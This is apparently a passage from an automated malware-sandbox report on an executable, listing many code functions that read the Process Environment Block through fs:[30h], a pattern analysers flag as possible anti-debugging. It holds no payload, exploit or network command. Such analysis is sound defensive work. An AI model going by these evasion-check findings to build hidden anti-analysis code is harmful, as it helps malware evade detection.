          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01496050 mov eax, dword ptr fs:[00000030h]2_2_01496050
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143C073 mov eax, dword ptr fs:[00000030h]2_2_0143C073
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01494000 mov ecx, dword ptr fs:[00000030h]2_2_01494000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]2_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]2_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]2_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]2_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]2_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]2_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]2_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]2_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E016 mov eax, dword ptr fs:[00000030h]2_2_0142E016
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E016 mov eax, dword ptr fs:[00000030h]2_2_0142E016
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E016 mov eax, dword ptr fs:[00000030h]2_2_0142E016
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E016 mov eax, dword ptr fs:[00000030h]2_2_0142E016
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140A020 mov eax, dword ptr fs:[00000030h]2_2_0140A020
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140C020 mov eax, dword ptr fs:[00000030h]2_2_0140C020
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A6030 mov eax, dword ptr fs:[00000030h]2_2_014A6030
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014920DE mov eax, dword ptr fs:[00000030h]2_2_014920DE
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0140A0E3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014180E9 mov eax, dword ptr fs:[00000030h]2_2_014180E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014960E0 mov eax, dword ptr fs:[00000030h]2_2_014960E0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140C0F0 mov eax, dword ptr fs:[00000030h]2_2_0140C0F0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014520F0 mov ecx, dword ptr fs:[00000030h]2_2_014520F0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141208A mov eax, dword ptr fs:[00000030h]2_2_0141208A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014080A0 mov eax, dword ptr fs:[00000030h]2_2_014080A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A80A8 mov eax, dword ptr fs:[00000030h]2_2_014A80A8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D60B8 mov eax, dword ptr fs:[00000030h]2_2_014D60B8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D60B8 mov ecx, dword ptr fs:[00000030h]2_2_014D60B8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]2_2_01492349
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E634F mov eax, dword ptr fs:[00000030h]2_2_014E634F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]2_2_0149035C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]2_2_0149035C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]2_2_0149035C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149035C mov ecx, dword ptr fs:[00000030h]2_2_0149035C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]2_2_0149035C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]2_2_0149035C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B8350 mov ecx, dword ptr fs:[00000030h]2_2_014B8350
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DA352 mov eax, dword ptr fs:[00000030h]2_2_014DA352
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B437C mov eax, dword ptr fs:[00000030h]2_2_014B437C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A30B mov eax, dword ptr fs:[00000030h]2_2_0144A30B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A30B mov eax, dword ptr fs:[00000030h]2_2_0144A30B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A30B mov eax, dword ptr fs:[00000030h]2_2_0144A30B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140C310 mov ecx, dword ptr fs:[00000030h]2_2_0140C310
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01430310 mov ecx, dword ptr fs:[00000030h]2_2_01430310
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E8324 mov eax, dword ptr fs:[00000030h]2_2_014E8324
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E8324 mov ecx, dword ptr fs:[00000030h]2_2_014E8324
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E8324 mov eax, dword ptr fs:[00000030h]2_2_014E8324
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E8324 mov eax, dword ptr fs:[00000030h]2_2_014E8324
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CC3CD mov eax, dword ptr fs:[00000030h]2_2_014CC3CD
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]2_2_0141A3C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]2_2_0141A3C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]2_2_0141A3C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]2_2_0141A3C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]2_2_0141A3C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]2_2_0141A3C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014183C0 mov eax, dword ptr fs:[00000030h]2_2_014183C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014183C0 mov eax, dword ptr fs:[00000030h]2_2_014183C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014183C0 mov eax, dword ptr fs:[00000030h]2_2_014183C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014183C0 mov eax, dword ptr fs:[00000030h]2_2_014183C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014963C0 mov eax, dword ptr fs:[00000030h]2_2_014963C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE3DB mov eax, dword ptr fs:[00000030h]2_2_014BE3DB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE3DB mov eax, dword ptr fs:[00000030h]2_2_014BE3DB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE3DB mov ecx, dword ptr fs:[00000030h]2_2_014BE3DB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE3DB mov eax, dword ptr fs:[00000030h]2_2_014BE3DB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B43D4 mov eax, dword ptr fs:[00000030h]2_2_014B43D4
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B43D4 mov eax, dword ptr fs:[00000030h]2_2_014B43D4
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]2_2_014203E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]2_2_014203E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]2_2_014203E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]2_2_014203E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]2_2_014203E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]2_2_014203E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]2_2_014203E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]2_2_014203E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E3F0 mov eax, dword ptr fs:[00000030h]2_2_0142E3F0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E3F0 mov eax, dword ptr fs:[00000030h]2_2_0142E3F0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E3F0 mov eax, dword ptr fs:[00000030h]2_2_0142E3F0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014463FF mov eax, dword ptr fs:[00000030h]2_2_014463FF
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140E388 mov eax, dword ptr fs:[00000030h]2_2_0140E388
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140E388 mov eax, dword ptr fs:[00000030h]2_2_0140E388
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140E388 mov eax, dword ptr fs:[00000030h]2_2_0140E388
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143438F mov eax, dword ptr fs:[00000030h]2_2_0143438F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143438F mov eax, dword ptr fs:[00000030h]2_2_0143438F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01408397 mov eax, dword ptr fs:[00000030h]2_2_01408397
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01408397 mov eax, dword ptr fs:[00000030h]2_2_01408397
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01408397 mov eax, dword ptr fs:[00000030h]2_2_01408397
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01498243 mov eax, dword ptr fs:[00000030h]2_2_01498243
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01498243 mov ecx, dword ptr fs:[00000030h]2_2_01498243
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140A250 mov eax, dword ptr fs:[00000030h]2_2_0140A250
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E625D mov eax, dword ptr fs:[00000030h]2_2_014E625D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416259 mov eax, dword ptr fs:[00000030h]2_2_01416259
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CA250 mov eax, dword ptr fs:[00000030h]2_2_014CA250
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CA250 mov eax, dword ptr fs:[00000030h]2_2_014CA250
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01414260 mov eax, dword ptr fs:[00000030h]2_2_01414260
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01414260 mov eax, dword ptr fs:[00000030h]2_2_01414260
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01414260 mov eax, dword ptr fs:[00000030h]2_2_01414260
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140826B mov eax, dword ptr fs:[00000030h]2_2_0140826B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]2_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140823B mov eax, dword ptr fs:[00000030h]2_2_0140823B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]2_2_0141A2C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]2_2_0141A2C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]2_2_0141A2C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]2_2_0141A2C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]2_2_0141A2C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E62D6 mov eax, dword ptr fs:[00000030h]2_2_014E62D6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014202E1 mov eax, dword ptr fs:[00000030h]2_2_014202E1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014202E1 mov eax, dword ptr fs:[00000030h]2_2_014202E1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014202E1 mov eax, dword ptr fs:[00000030h]2_2_014202E1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E284 mov eax, dword ptr fs:[00000030h]2_2_0144E284
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E284 mov eax, dword ptr fs:[00000030h]2_2_0144E284
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01490283 mov eax, dword ptr fs:[00000030h]2_2_01490283
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01490283 mov eax, dword ptr fs:[00000030h]2_2_01490283
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01490283 mov eax, dword ptr fs:[00000030h]2_2_01490283
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014202A0 mov eax, dword ptr fs:[00000030h]2_2_014202A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014202A0 mov eax, dword ptr fs:[00000030h]2_2_014202A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]2_2_014A62A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A62A0 mov ecx, dword ptr fs:[00000030h]2_2_014A62A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]2_2_014A62A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]2_2_014A62A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]2_2_014A62A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]2_2_014A62A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01418550 mov eax, dword ptr fs:[00000030h]2_2_01418550
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01418550 mov eax, dword ptr fs:[00000030h]2_2_01418550
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144656A mov eax, dword ptr fs:[00000030h]2_2_0144656A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144656A mov eax, dword ptr fs:[00000030h]2_2_0144656A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144656A mov eax, dword ptr fs:[00000030h]2_2_0144656A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A6500 mov eax, dword ptr fs:[00000030h]2_2_014A6500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]2_2_014E4500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]2_2_014E4500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]2_2_014E4500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]2_2_014E4500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]2_2_014E4500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]2_2_014E4500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]2_2_014E4500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]2_2_01420535
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]2_2_01420535
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]2_2_01420535
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]2_2_01420535
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]2_2_01420535
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]2_2_01420535
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]2_2_0143E53E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]2_2_0143E53E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]2_2_0143E53E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]2_2_0143E53E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]2_2_0143E53E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E5CF mov eax, dword ptr fs:[00000030h]2_2_0144E5CF
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E5CF mov eax, dword ptr fs:[00000030h]2_2_0144E5CF
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014165D0 mov eax, dword ptr fs:[00000030h]2_2_014165D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A5D0 mov eax, dword ptr fs:[00000030h]2_2_0144A5D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A5D0 mov eax, dword ptr fs:[00000030h]2_2_0144A5D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014125E0 mov eax, dword ptr fs:[00000030h]2_2_014125E0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]2_2_0143E5E7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]2_2_0143E5E7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]2_2_0143E5E7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]2_2_0143E5E7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]2_2_0143E5E7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]2_2_0143E5E7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]2_2_0143E5E7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]2_2_0143E5E7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144C5ED mov eax, dword ptr fs:[00000030h]2_2_0144C5ED
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144C5ED mov eax, dword ptr fs:[00000030h]2_2_0144C5ED
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01412582 mov eax, dword ptr fs:[00000030h]2_2_01412582
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01412582 mov ecx, dword ptr fs:[00000030h]2_2_01412582
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01444588 mov eax, dword ptr fs:[00000030h]2_2_01444588
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E59C mov eax, dword ptr fs:[00000030h]2_2_0144E59C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014905A7 mov eax, dword ptr fs:[00000030h]2_2_014905A7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014905A7 mov eax, dword ptr fs:[00000030h]2_2_014905A7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014905A7 mov eax, dword ptr fs:[00000030h]2_2_014905A7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014345B1 mov eax, dword ptr fs:[00000030h]2_2_014345B1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014345B1 mov eax, dword ptr fs:[00000030h]2_2_014345B1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]2_2_0144E443
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]2_2_0144E443
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]2_2_0144E443
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]2_2_0144E443
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]2_2_0144E443
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]2_2_0144E443
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]2_2_0144E443
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]2_2_0144E443
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143245A mov eax, dword ptr fs:[00000030h]2_2_0143245A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CA456 mov eax, dword ptr fs:[00000030h]2_2_014CA456
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140645D mov eax, dword ptr fs:[00000030h]2_2_0140645D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149C460 mov ecx, dword ptr fs:[00000030h]2_2_0149C460
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143A470 mov eax, dword ptr fs:[00000030h]2_2_0143A470
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143A470 mov eax, dword ptr fs:[00000030h]2_2_0143A470
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143A470 mov eax, dword ptr fs:[00000030h]2_2_0143A470
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01448402 mov eax, dword ptr fs:[00000030h]2_2_01448402
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01448402 mov eax, dword ptr fs:[00000030h]2_2_01448402
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01448402 mov eax, dword ptr fs:[00000030h]2_2_01448402
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140E420 mov eax, dword ptr fs:[00000030h]2_2_0140E420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140E420 mov eax, dword ptr fs:[00000030h]2_2_0140E420
